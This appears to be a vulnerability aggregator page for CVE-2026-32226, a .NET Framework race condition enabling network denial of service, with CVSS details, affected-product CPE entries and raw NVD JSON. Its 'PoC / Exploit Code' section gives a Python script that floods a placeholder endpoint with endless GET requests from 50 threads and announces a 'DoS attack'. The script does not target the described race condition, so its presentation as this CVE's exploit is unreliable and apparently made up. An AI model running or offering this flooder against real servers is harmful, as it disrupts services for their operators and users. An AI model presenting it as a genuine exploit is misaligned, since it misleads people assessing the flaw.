Security Vulnerability Report
中文
CVE-2026-32226 CVSS 5.9 MEDIUM

CVE-2026-32226

Published: 2026-04-14 18:17:31
Last Modified: 2026-05-06 15:00:59

Description

Concurrent execution using shared resource with improper synchronization ('race condition') in .NET Framework allows an unauthorized attacker to deny service over a network.

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:microsoft:.net_framework:3.5:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:microsoft:.net_framework:4.7.2:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_1809:-:*:*:*:*:*:arm64:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows_10_1809:-:*:*:*:*:*:x64:* - NOT VULNERABLE
cpe:2.3:a:microsoft:.net_framework:3.5:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:microsoft:.net_framework:4.8:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_1809:-:*:*:*:*:*:arm64:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows_10_1809:-:*:*:*:*:*:x64:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows_10_1809:-:*:*:*:*:*:x86:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows_server_20h2:-:*:*:*:*:*:x64:* - NOT VULNERABLE
cpe:2.3:a:microsoft:.net_framework:4.8:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_1607:-:*:*:*:*:*:x64:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:a:microsoft:.net_framework:3.5:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:microsoft:.net_framework:4.8.1:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows_11_26h1:-:*:*:*:*:*:arm64:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows_11_26h1:-:*:*:*:*:*:x64:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows_server_2025:-:*:*:*:*:*:x64:* - NOT VULNERABLE
.NET Framework (具体受影响版本需参考微软官方安全公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import threading import requests # Target URL (Replace with the vulnerable endpoint) TARGET_URL = "http://vulnerable-server/api/endpoint" def send_malicious_request(): """ Function to send requests continuously to trigger race condition. """ try: while True: # Sending requests to create concurrent execution flow response = requests.get(TARGET_URL, timeout=2) except Exception as e: print(f"Request failed: {e}") if __name__ == "__main__": # Create multiple threads to simulate high concurrency threads = [] thread_count = 50 # Adjust based on server capacity print(f"Starting DoS attack on {TARGET_URL} with {thread_count} threads...") for i in range(thread_count): t = threading.Thread(target=send_malicious_request) threads.append(t) t.start() for t in threads: t.join()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32226", "sourceIdentifier": "[email protected]", "published": "2026-04-14T18:17:31.190", "lastModified": "2026-05-06T15:00:58.713", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Concurrent execution using shared resource with improper synchronization ('race condition') in .NET Framework allows an unauthorized attacker to deny service over a network."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-362"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:.net_framework:3.5:-:*:*:*:*:*:*", "matchCriteriaId": "23317443-1968-4791-9F20-AD3B308A83D1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:.net_framework:4.7.2:*:*:*:*:*:*:*", "matchCriteriaId": "3EF7A75E-EE27-4AA7-8D84-9D696728A4CE"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows_10_1809:-:*:*:*:*:*:arm64:*", "matchCriteriaId": "73D24713-D897-408D-893B-77A61982597D"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows_10_1809:-:*:*:*:*:*:x64:*", "matchCriteriaId": "306B7CE6-8239-4AED-9ED4-4C9F5B349F58"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:.net_framework:3.5:-:*:*:*:*:*:*", "matchCriteriaId": "23317443-1968-4791-9F20-AD3B308A83D1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:.net_framework:4.8:*:*:*:*:*:*:*", "matchCriteriaId": "2D3F18AF-84ED-473B-A8DF-65EB23C475AF"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows_10_1809:-:*:*:*:*:*:arm64:*", "matchCriteriaId": "73D24713-D897-408D-893B-77A61982597D"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows_10_1809:-:*:*:*:*:*:x64:*", "matchCriteriaId": "306B7CE6-8239-4AED-9ED4-4C9F5B349F58"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows_10_1809:-:*:*:*:*:*:x86:*", "matchCriteriaId": "345FCD64-D37B-425B-B64C-8B1640B7E850"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows_server_20h2:-:*:*:*:*:*:x64:*", "matchCriteriaId": "23DB22F4-7FFB-4B77-A4BF-EC097938E239"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:.net_framework:4.8:*:*:*:*:*:*:*", "matchCriteriaId": "2D3F18AF-84ED-473B-A8DF-65EB23C475AF"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows_10_1607:-:*:*:*:*:*:x64:*", "matchCriteriaId": "5E491E46-1917-41FE-8F9A-BB0BDDEB42C3"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "matchCriteriaId": "A7DF96F8-BA6A-4780-9CA3-F719B3F81074"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "matchCriteriaId": "DB18C4CE-5917-401E-ACF7-2747084FD36E"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:.net_framework:3.5:-:*:*:*:*:*:*", "matchCriteriaId": "23317443-1968-4791-9F20-AD3B308A83D1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:.net_framework:4.8.1:*:*:*:*:*:*:*", "matchCriteriaId": "934D4E46-12C1-41DC-A28C-A2C430E965E4"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows_11_26h1:-:*:*:*:*:*:arm64:*", "matchCriteriaId": "CBFE0371-0C4D-406A-9EC7-456104271C3E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows_11_26h1:-:*:*:*:*:*:x64:*", "matchCriteriaId": "F2B83840-FCE8-445A-AE55-ACEDA6534FA1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows_server_2025:-:*:*:*:*:*:x64:*", "matchCriteriaId": "FE97605F-7942-435A-9F5B-D51FA19A41AD"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32226", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}